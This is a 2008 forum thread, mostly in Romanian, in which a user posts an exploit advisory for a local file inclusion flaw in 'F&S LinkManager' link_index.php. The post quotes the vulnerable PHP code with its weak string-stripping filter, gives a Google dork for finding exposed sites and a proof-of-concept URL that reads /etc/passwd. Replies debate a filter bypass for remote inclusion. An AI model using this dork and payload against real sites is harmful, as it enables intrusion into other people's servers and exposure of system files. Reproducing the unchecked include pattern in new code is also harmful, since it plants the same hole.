Guest Kenpachi Posted August 19, 2008 Report Share Posted August 19, 2008 Software : F&S LinkManager 1.2 Final Gold EditionBUG Type : Local File InclusionBUG In : link_index.phpBUg :$show = $HTTP_GET_VARS['show'];if ($show == ""){ [...]}else {[RFI FILTER $oldshow = $show;$oldsize = strlen($show);$show = str_replace("http://", "" , $show);$show = str_replace("www", "" , $show);$show = str_replace("ftp://", "" , $show);$show = str_replace("https://", "" , $show);$newsize = strlen($show);if($oldsize == $newsize){[NO LFI FILTER ]include "$show";}Google Dork : inurl:"link_index.php?show"POC : [url]www.example.com/[/url][path]/link_index.php?show=/etc/passwd//Kenpachi @ RSTCENTER.COMNO GREETS, JUST MEla recomandarea lui stroke uitati si link sa downloadati softwareul in cauza :[url]http://rapidshare.com/files/138499333/linklist.zip.html[/url] Quote Link to comment Share on other sites More sharing options...
kw3rln Posted August 22, 2008 Report Share Posted August 22, 2008 nice findcam copaci programatorii aia else {[RFI FILTER $oldshow = $show;$oldsize = strlen($show);$show = str_replace("http://", "" , $show);$show = str_replace("www", "" , $show);$show = str_replace("ftp://", "" , $show);$show = str_replace("https://", "" , $show);$newsize = strlen($show);if($oldsize == $newsize){[NO LFI FILTER ] Quote Link to comment Share on other sites More sharing options...
praitrok Posted August 22, 2008 Report Share Posted August 22, 2008 Nu poate fi si remote file inclusion daca se incearca httphttp://:// ? Quote Link to comment Share on other sites More sharing options...
kw3rln Posted August 22, 2008 Report Share Posted August 22, 2008 Nu poate fi si remote file inclusion daca se incearca httphttp://:// ?nunu .. ca atunci nu mai include $show .. nu mai respecta conditia new=old Quote Link to comment Share on other sites More sharing options...
Guest Kenpachi Posted August 23, 2008 Report Share Posted August 23, 2008 welcome captain obvious Quote Link to comment Share on other sites More sharing options...